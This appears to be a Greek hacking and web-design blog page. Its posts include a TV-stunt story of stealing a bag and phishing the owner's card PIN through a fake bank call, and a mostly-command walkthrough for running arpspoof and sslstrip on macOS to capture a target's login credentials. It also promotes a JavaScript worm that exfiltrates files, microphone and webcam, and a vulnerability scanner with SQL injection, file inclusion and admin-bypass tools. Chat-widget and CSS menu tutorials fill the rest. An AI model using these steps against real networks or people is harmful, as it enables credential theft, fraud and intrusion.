Το θύμα δεν πρόσεξε ότι η καρέκλα ήταν άδεια και ο Alex με την Jess έφυγαν από την καφετέρια και ο Alex πήγε γρήγορα στο πάρκινγκ. Δεν πήρε πολύ στο θύμα για να καταλάβει ότι λείπει η τσάντα του και τότε άρχισε να πανικοβάλεται. Σηκώθηκε και κοίταξε τριγύρω με νευρικότητα. ( Αυτό ήταν που ευχόμασταν να συμβεί). Ο C.H. την ρώτησε αν χρειαζόταν βοήθεια και εκείνει τον ρώτησε αν είχε δει τίποτα. Ο ίδιος απάντησε πως δεν είδε τίποτα και την έπεισε να κάτσει κάτω να ηρεμήσει και να σκεφτεί τι ήταν μέσα στην τσάντα της. Το τηλέφωνο της, το make up, μερικά χρήματα και οι πιστωτικές της κάρτες!

Στη συνέχεια την ρώτησε σε ποια τράπεζα είχε τις κάρτες και της είπε ότι δουλεύει σε αυτήν την τράπεζα. Τι μεγάλη τύχη! Την βεβαίωσε ότι όλα θα πάνε καλά, απλά έπρεπε να ακυρώσει τις κάρτες της αμέσως. Ο C.H. κάλεσε την "τράπεζα" που στην πραγματικότητα ήταν ο Alex και έδωσε το τηλέφωνο στο θύμα. Το πήρε και τότε ήταν πάνω στον Alex αν θα τα καταφέρει.

Ο ίδιος ήταν σε ένα βανάκι στο πάρκινγκ και είχε βάλει ήχο από φασαρία γραφείου που είχε κατεβάσει από το ίντερνετ να παίζει. Ηρέμησε το θύμα και την επιβεβαίωσε ότι μπορεί εύκολα να ακυρώσει τις κάρτες της απλά θα έπρεπε να πληκτρολογίσει το Pin της κάρτας της στο πληκτρολόγιο του τηλεφώνου για να εξακριβώσει τα στοιχεία της.

Όπως λέει ο C.H. : Το τηλέφωνο μου, και το πληκτρολόγιο μου.

Μπορείτε να μαντάψετε τα υπόλοιπα. Μόλις πήραμε το PIN έφυγα και την άφησα με τον φίλο της και κατευθήνθηκα προς την πόρτα. Αν είμασταν πραγματικοί κλέφτες θα είχαμε πρόσβαση στο λογαριασμό της και θα μπορούσαμε να πάρουμε τα πάντα.

Ευτυχώς γι αυτήν ήταν μόνο ένα TV show και ήταν χαρούμενη που όταν γύρισα της επέστρεψα της τσάντα και ήξερε ότι όλα ήταν ένα show. Με ευχαρίστησε ακόμα που της έδωσα την τσάντα και εγώ της απάντησα, Μην με ευχαριστείς, εγώ είμαι αυτός που στην έκλεψε.

Ιανουαρίου 11, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Πως να βάλετε chat στην άκρη της σελίδας

Written By Fouls Code on Παρασκευή, 6 Ιανουαρίου 2017 | Ιανουαρίου 06, 2017



Το chat θα είναι στα σταθερό και όταν τοποθετείται το βελάκια πάνω θα εμφανίζεται και το αντίστροφο πάμε να το δούμε:

Αφού πρώτα κάνετε εγγραφη στο http://chatroll.com/ αντιγράψτε τον παρακάτω κώδικα.





<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript">
</script>
<script type="text/javascript">
//<!--
$(document).ready(function() {$(".floatinglikebox").hover(function() {$(this).stop().animate({right: "0"}, "medium");}, function() {$(this).stop().animate({right: "-250"}, "medium");}, 500);});
//-->
</script>
<style type="text/css">
.floatinglikebox{background: url("http://4.bp.blogspot.com/-l377y75Cws4/UO3vKqxoPVI/AAAAAAAAAw0/v5eTdlLAdDw/s1600/chat.jpg") no-repeat scroll left center transparent !important;display: block;float: right;height: 270px;padding: 0 5px 0 29px;width: 245px;z-index: 99999;position:fixed;right:-250px;top:35%;}
.floatinglikebox div{border:none;position:relative;display:block;}
.floatinglikebox span{bottom: 10px;font: 10px tahoma,verdana,arial,sans-serif;position: absolute;right: 6px;text-align: right;z-index: 99999;}
.floatinglikebox span a{color: #808080;text-decoration:none;}
.floatinglikebox span a:hover{text-decoration:underline;}
</style><div class="floatinglikebox" style=""><iframe width="100%" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true" src="http://chatroll.com/embed/chat/cn36?id=V1iodxlcCde&platform=blogger&w=$0"></iframe></div>

Αντικαταστήστε το link με το δικό σας που το βρίσκουμε All Events  Το chat σας Settings – Basic


θα το δούμε εδώ




Αποθήκευση και τελειώσατε.

Απορίες αν έχετε αφήστε το σχολειό σας!

Ιανουαρίου 06, 2017 | 0 σχόλια | Διαβάστε περισσότερα

SSL Strip on Mac OS X

Written By Fouls Code on Δευτέρα, 2 Ιανουαρίου 2017 | Ιανουαρίου 02, 2017

First, we need to install the tools required, which are arpspoof and sslstrip. arpspoof comes with the dsniff suite and you can try to compile dsniff manually but I used macports to do it. Here are the steps I took :-

Installing arpspoof




    Make sure Xcode is installed. You can do this from the App Store.
  1. Make sure that Command Line Tools are installed.


  2. Download the installation package from macports here.
  3. Install it by opening and following through the installation. Straightforward.
  4. Open up a Terminal window.
  5. Do an update, by typing sudo port -d selfupdate
  6. Install dsniff, by typing sudo port install dsniff. The command should take a while but fail eventually. (may have changed, if it doesn't fail, skip to step 10.)
  7. One of the dependancies for dsniff is libnids. And one of the dependancies of libnids is libnet. It turns out that the default variant is libnids +libnet11, which will not work. So we need to uninstall libnids, and install the other variant. Do this with 

    • sudo port uninstall libnids
    • sudo port install libnids +libnet

  8. Try sudo port install dsniff again. It should work this time.
  9. arpspoof should have been installed. You can test it out from the Terminal window by typing arpspoof -h.

Installing sslstrip

  1. We need some python packages that are needed by sslstrip. Install them by typing this in a Terminal window

    • sudo port install python27 (optional?)
    • sudo port install py27-openssl
    • sudo port install py27-twisted-web2
    • sudo port install python_select (optional?)

  2. Download sslstrip. I used the 0.9-2 version.
  3. Decompress the archive.
  4. sslstrip should now be working from the decompressed archive. You can test it out from the Terminal window by typing python sslstrip.py -h from the sslstrip-0.9.2 folder.

Getting ready to run

  1. Run the following commands. They allow you to use your mac to forward any incoming ip packets.

    • sudo sysctl -w net.inet.ip.forwarding=1
    • sudo sysctl -w net.inet.ip.fw.enable=1
    • sudo sysctl -w net.inet.ip.fw.verbose=1 (optional?)

  2. At this point, you can choose to modify sslstripI preferred a cleaner output so I added in a try-catch at the following lines in the ServerConnection.py file.

  3.             try:
                    HTTPClient.handleResponseEnd(self)
                except:
                    pass

    I also made some other changes. In particular, I made the log level to be debug mode, so I can see them from the log file generated, if I need to. Important data I made to print out from the console, such as urls, logins, and passwords.
  4. We need to do port redirection of traffic. The usual packet firewall ipfw did not work - it was slated to be deprecated in Mountain Lion. Instead I used pf (for Packet Filter) instead. Make a backup of the file /etc/pf.conf, and save it somewhere, e.g. pf_mod.conf.
  5. Specifically, we want to redirect all http traffic to our localhost at a specified port, say 8080. Insert the following line in the beginning of the file. This line says to redirect all incoming traffic from the interface en1, with any source and any destination address, but port 80 to localhost (127.0.0.1) on port 8080. Assuming en1 is the interface name you are using.

  6. rdr pass on en1 proto tcp from any to any port 80 -> 127.0.0.1 port 8080

  7. Run  sudo pfctl -e -f pf_mod.conf. This command enables the packet filter and to take its rules from the pf_mod.conf file.
    (To disable after you're done, simply do the same command with the backup file that you copied in step 3. You may also want to type
     sudo pfctl -d to disable the packet filter, if it was disabled in the first place.)
  8. Start sslstrip by typing python sslstrip.py -p -k -l 8080 -w ./sslstrip.log.  Here, we are specifying that we only want to see secure post data, kill sessions, to listen at port 8080, and all output to be written to the file sslstrip.log. If run sucessfully, it should say that it is running.
  9. Choose a target IP address, say 192.168.1.20. You can find this out using nmap. Also, find out now where your router is, say 192.168.1.1. You can find this out using netstat -rn, and looking at the default gateway. Now type in the following command in a new Terminal window.

  10. arpspoof -i en1 -t 192.168.1.20 192.168.1.1

  11. You should be getting your credentials in your sslstrip.log file, when the target logins to a secure website.
Credits to Moxie for sslstrip and Dug Song for arpspoof.

via: techjots.blogspot.com
Ιανουαρίου 02, 2017 | 0 σχόλια | Διαβάστε περισσότερα

The Little Doctor



Little Docter is a JavaScript worm that can exfiltrate files, microphone, webcam, and other data; first demo'd at Kiwicon X.

Setup


Install docker, then edit the docker-compose.yml to your liking and execute docker-compose up or if you've broght your own server just drop the main.js file into any origin you can.


server                                Randomized cache buster                      2 months ago
.gitignore                          First cut of the working webrtc module 2 months ago
README.md                  Added pretty picture                               2 months ago
docker-compose.yml        Randomized cache buster                      2 months ago
little-doctor.png                Added pretty picture                              2 months ago






Clone with HTTPS: https://github.com/infosec-au/little-doctor.git


Ιανουαρίου 02, 2017 | 0 σχόλια | Διαβάστε περισσότερα

ParanoicScan



Vulnerability Scanner

As the first program of 2014 I bring you the new version of my ParanoicScan in its version 1.7, while some people stole the source code of the previous version of this program code, the issue is that not bother me that you used the code but only changed him the program name and the name of the author did not bother to change the names of the variables only changed the name of the author, for a moment hesitate to continue to share the code of this 2-year project working but despite that I continue to share the code of this program, besides explorer (of perlenespanol) recommended me to do another version of this program was to demonstrate that the real author so that the program has the dual function and arrange countless bugs that were in all the code.


[++] Old Options


Google & Bing Scanner that also scan :

XSS

SQL GET / POST

SQL GET

SQL GET + Admin

Directory listing

MSSQL

Jet Database

Oracle

LFI

RFI

Full Source Discloure

HTTP Information

SQLi Scanner

Bypass Admin

Exploit FSD Manager

Paths Finder

IP Locate

Crack MD5

Panel Finder

Console


[++] Fixes


[+] Refresh of existing pages to crack md5
[+] Error scanner fsd
[+] Http error scanner scan
[+] Spaces between text too annoying
[+] Added array to bypass
[+] Failed to read from file


[++] New options


[+] Generate all logs in a html file
[+] Incorporates random and new useragent
[+] Multi encoder / decoder :

Ascii

Hex

Url

Bin To Text & Text To Bin


[+] PortScanner
[+] HTTP FingerPrinting
[+] CSRF Tool
[+] Scan XSS
[+] Generator for XSS Bypass
[+] Generator links to tiny url
[+] Finder and downloader exploits on Exploit-DB
[+] Mysql Manager
[+] Tools LFI


An image :



An video :

Available for download here :


https://github.com/DoddyHackman/ParanoicScan
https://code.google.com/p/paranoicscan/source/browse/
https://sourceforge.net/projects/paranoicscan/?source=directory
http://pastebin.com/yKfJhCT2


Perl Updated a year ago
Python/ParanoicScan 0.4 Updated a year ago
Zip Updated a year ago
.gitattributes Vulnerability Scanner 3 years ago
.gitignore Vulnerability Scanner 3 years ago
README.md

Good Bye
Ιανουαρίου 02, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Δίκτυα video - Part 5

Ιανουαρίου 02, 2017 | 0 σχόλια | Διαβάστε περισσότερα

Show/Hide Menu with CSS

Written By Fouls Code on Κυριακή, 1 Ιανουαρίου 2017 | Ιανουαρίου 01, 2017






<style>
  /* wwwfoulscode.com */
  @import url(//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css);
}
@import url(http://fonts.googleapis.com/css?family=Titillium+Web:300);
.fa-2x {
font-size: 2em;
}
.fa {
position: relative;
display: table-cell;
width: 60px;
height: 36px;
text-align: center;
vertical-align: middle;
font-size:20px;
}

.main-menu:hover,nav.main-menu.expanded {
width:250px;
overflow:visible;
}
.main-menu {
background:#fbfbfb;
border-right:1px solid #e5e5e5;
position:absolute;
top:0;
bottom:0;
height:100%;
left:0;
width:60px;
overflow:hidden;
-webkit-transition:width .05s linear;
transition:width .05s linear;
-webkit-transform:translateZ(0) scale(1,1);
z-index:1000;
}
.main-menu>ul {
margin:7px 0;
}
.main-menu li {
position:relative;
display:block;
width:250px;
}
.main-menu li>a {
position:relative;
display:table;
border-collapse:collapse;
border-spacing:0;
color:#999;
 font-family: arial;
font-size: 14px;
text-decoration:none;
-webkit-transform:translateZ(0) scale(1,1);
-webkit-transition:all .1s linear;
transition:all .1s linear;

}
.main-menu .nav-icon {
position:relative;
display:table-cell;
width:60px;
height:36px;
text-align:center;
vertical-align:middle;
font-size:18px;
}
.main-menu .nav-text {
position:relative;
display:table-cell;
vertical-align:middle;
width:190px;
  font-family: 'Titillium Web', sans-serif;
}
.main-menu>ul.logout {
position:absolute;
left:0;
bottom:0;
}
.no-touch .scrollable.hover {
overflow-y:hidden;
}
.no-touch .scrollable.hover:hover {
overflow-y:auto;
overflow:visible;
}
a:hover,a:focus {
text-decoration:none;
}
nav {
-webkit-user-select:none;
-moz-user-select:none;
-ms-user-select:none;
-o-user-select:none;
user-select:none;
}
nav ul,nav li {
outline:0;
margin:0;
padding:0;
}
.main-menu li:hover>a,nav.main-menu li.active>a,.dropdown-menu>li>a:hover,.dropdown-menu>li>a:focus,.dropdown-menu>.active>a,.dropdown-menu>.active>a:hover,.dropdown-menu>.active>a:focus,.no-touch .dashboard-page nav.dashboard-menu ul li:hover a,.dashboard-page nav.dashboard-menu ul li.active a {
color:#fff;
background-color:#5fa2db;
}
.area {
float: left;
background: #e2e2e2;
width: 100%;
height: 100%;
}
@font-face {
  font-family: 'Titillium Web';
  font-style: normal;
  font-weight: 300;
  src: local('Titillium WebLight'), local('TitilliumWeb-Light'), url(http://themes.googleusercontent.com/static/fonts/titilliumweb/v2/anMUvcNT0H1YN4FII8wpr24bNCNEoFTpS2BTjF6FB5E.woff) format('woff');
}
  /* wwwfoulscode.com */
</style
  <html>
  <head>

  </head>
  <body><div class="area"></div><nav class="main-menu">
            <ul>
                <li>
                    <a href="#">
                        <i class="fa fa-home fa-2x"></i>
                        <span class="nav-text">
                            Dashboard
                        </span>
                    </a>
                 
                </li>
                <li class="has-subnav">
                    <a href="#">
                        <i class="fa fa-laptop fa-2x"></i>
                        <span class="nav-text">
                            UI Components
                        </span>
                    </a>
                   
                </li>
                <li class="has-subnav">
                    <a href="#">
                       <i class="fa fa-list fa-2x"></i>
                        <span class="nav-text">
                            Forms
                        </span>
                    </a>
                   
                </li>
                <li class="has-subnav">
                    <a href="#">
                       <i class="fa fa-folder-open fa-2x"></i>
                        <span class="nav-text">
                            Pages
                        </span>
                    </a>
                 
                </li>
                <li>
                    <a href="#">
                        <i class="fa fa-bar-chart-o fa-2x"></i>
                        <span class="nav-text">
                            Graphs and Statistics
                        </span>
                    </a>
                </li>
                <li>
                    <a href="#">
                        <i class="fa fa-font fa-2x"></i>
                        <span class="nav-text">
                            Typography and Icons
                        </span>
                    </a>
                </li>
                <li>
                   <a href="#">
                       <i class="fa fa-table fa-2x"></i>
                        <span class="nav-text">
                            Tables
                        </span>
                    </a>
                </li>
                <li>
                   <a href="#">
                        <i class="fa fa-map-marker fa-2x"></i>
                        <span class="nav-text">
                            Maps
                        </span>
                    </a>
                </li>
                <li>
                    <a href="#">
                       <i class="fa fa-info fa-2x"></i>
                        <span class="nav-text">
                            Documentation
                        </span>
                    </a>
                </li>
            </ul>
            <ul class="logout">
                <li>
                   <a href="#">
                         <i class="fa fa-power-off fa-2x"></i>
                        <span class="nav-text">
                            Logout
                        </span>
                    </a>
                </li>
            </ul>
        </nav>
  </body>
    </html>

LIVE DEMO
Ιανουαρίου 01, 2017 | 0 σχόλια | Διαβάστε περισσότερα
 
berita unik